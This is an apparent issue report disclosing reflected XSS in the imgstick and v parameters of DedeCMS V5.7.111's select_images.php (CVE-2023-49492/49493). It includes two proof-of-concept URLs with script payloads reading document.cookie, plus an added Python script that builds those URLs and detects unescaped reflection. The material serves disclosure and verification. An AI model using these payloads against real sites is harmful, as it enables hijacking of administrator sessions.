Open Hebing123 opened 1 year ago
Description: DedeCMS-V5.7.111 has reflected XSS vulnerabilities in the imgstick and v parameters of select_images.php
Proof of Concept http://target-ip/uploads/include/dialog/select_images.php?activepath=/uploads/uploads/allimg&f=form1.pic1&imgstick=smallundefined%27%3E%3CScRiPt%20%3Ealert(document.cookie)%3C/ScRiPt%3E//
http://target-ip/uploads/include/dialog/select_images.php?activepath=/uploads/uploads/allimg&f=form1.pic1&imgstick=smallundefined&noeditor=yes&v=picview%3CScRiPt%20%3Ealert(document.cookie)%3C/ScRiPt%3E
Reflected XSS vulnerability in the imgstick and v parameters of select_images.php
Impact: Reflected XSS vulnerability triggered by an administrator accessing the link.
These are vulnerability exploitation references for CVE-2023-49492 and CVE-2023-49493.
Note: The activepath changes depending on whether the site runs in the uploads directory.
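Added verification example (not part of the report above and not DedeCMS code): a Python script that builds the two PoC requests from the report and decides whether a response reflects the payload as an actual script element (executable) rather than as escaped text or an attribute value (harmless). The `render_vulnerable` / `render_hardened` functions are constructed stand-ins for the dialog's HTML output and are an assumption about how the real template echoes the parameters (into a single-quoted attribute and a text node); the `alert(document.cookie)` marker and both payloads are taken from the PoC URLs.

```python
"""Added example, not DedeCMS code: build the report's two reflected-XSS PoC
URLs and test a response body for unescaped reflection of the payload."""
from html import escape
from html.parser import HTMLParser
from urllib.parse import urlencode, quote, urlsplit, parse_qs

# Payloads exactly as they appear (URL-decoded) in the report's PoC URLs.
PAYLOAD_IMGSTICK = "smallundefined'><ScRiPt >alert(document.cookie)</ScRiPt>//"
PAYLOAD_V = "picview<ScRiPt >alert(document.cookie)</ScRiPt>"
MARKER = "alert(document.cookie)"


def build_poc_urls(base="http://target-ip/uploads",
                   activepath="/uploads/uploads/allimg"):
    """Return the two PoC URLs from the report.

    `base` is the DedeCMS web root; the report notes that activepath changes
    depending on whether the site runs under /uploads, so both are parameters.
    """
    endpoint = base.rstrip("/") + "/include/dialog/select_images.php"
    common = {"activepath": activepath, "f": "form1.pic1"}
    q1 = dict(common, imgstick=PAYLOAD_IMGSTICK)
    q2 = dict(common, imgstick="smallundefined", noeditor="yes", v=PAYLOAD_V)
    # quote (not quote_plus) so spaces become %20 and slashes stay raw,
    # matching the encoding style of the report's URLs.
    return [endpoint + "?" + urlencode(q, safe="/", quote_via=quote)
            for q in (q1, q2)]


class _ScriptSniffer(HTMLParser):
    """Set `hit` when a <script> element whose body contains MARKER is parsed.

    A payload that only lands inside an attribute value, or is HTML-escaped
    into a text node, never produces a script start tag, so it is not counted.
    """
    def __init__(self):
        super().__init__()
        self._in_script = False
        self.hit = False

    def handle_starttag(self, tag, attrs):
        if tag == "script":          # HTMLParser lowercases tag names
            self._in_script = True

    def handle_endtag(self, tag):
        if tag == "script":
            self._in_script = False

    def handle_data(self, data):
        if self._in_script and MARKER in data:
            self.hit = True


def reflects_script(body):
    """True if `body` contains the PoC payload as an executable script element."""
    p = _ScriptSniffer()
    p.feed(body)
    p.close()
    return p.hit


# Constructed stand-ins for the dialog's HTML (assumption about the template:
# imgstick echoed into a single-quoted attribute, v echoed into a text node).
def render_vulnerable(imgstick, v):
    return (f"<input type='hidden' name='imgstick' value='{imgstick}'>\n"
            f"<div id='v'>{v}</div>")


def render_hardened(imgstick, v):
    # Equivalent of htmlspecialchars($x, ENT_QUOTES): escapes < > & " and '
    return (f"<input type='hidden' name='imgstick' "
            f"value='{escape(imgstick, quote=True)}'>\n"
            f"<div id='v'>{escape(v, quote=True)}</div>")


if __name__ == "__main__":
    for url in build_poc_urls():
        print(url)
    print("vulnerable reflects script:",
          reflects_script(render_vulnerable(PAYLOAD_IMGSTICK, PAYLOAD_V)))
    print("hardened reflects script:",
          reflects_script(render_hardened(PAYLOAD_IMGSTICK, PAYLOAD_V)))
```

To use this against a live instance, fetch each URL from `build_poc_urls()` with an authenticated admin session and pass the response body to `reflects_script`; a `True` result means the parameter is echoed unescaped in a context where the injected element is parsed as a script, which is the condition the PoC relies on.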